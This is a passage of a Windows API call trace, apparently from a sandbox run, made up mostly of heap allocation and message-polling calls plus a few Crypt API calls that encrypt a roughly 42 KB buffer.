[0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0189.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.612] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0189.613] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.614] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.614] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0189.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0189.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0189.618] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.618] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.618] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.618] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.618] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.618] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.618] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.618] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.618] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.619] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.619] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.619] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.619] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0189.619] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.620] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa5d9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa5e0) returned 1 [0189.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.620] CharLowerBuffW (in: lpsz="byte[42465]", cchLength=0xb | out: lpsz="byte[42465]") returned 0xb [0189.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.622] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.622] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 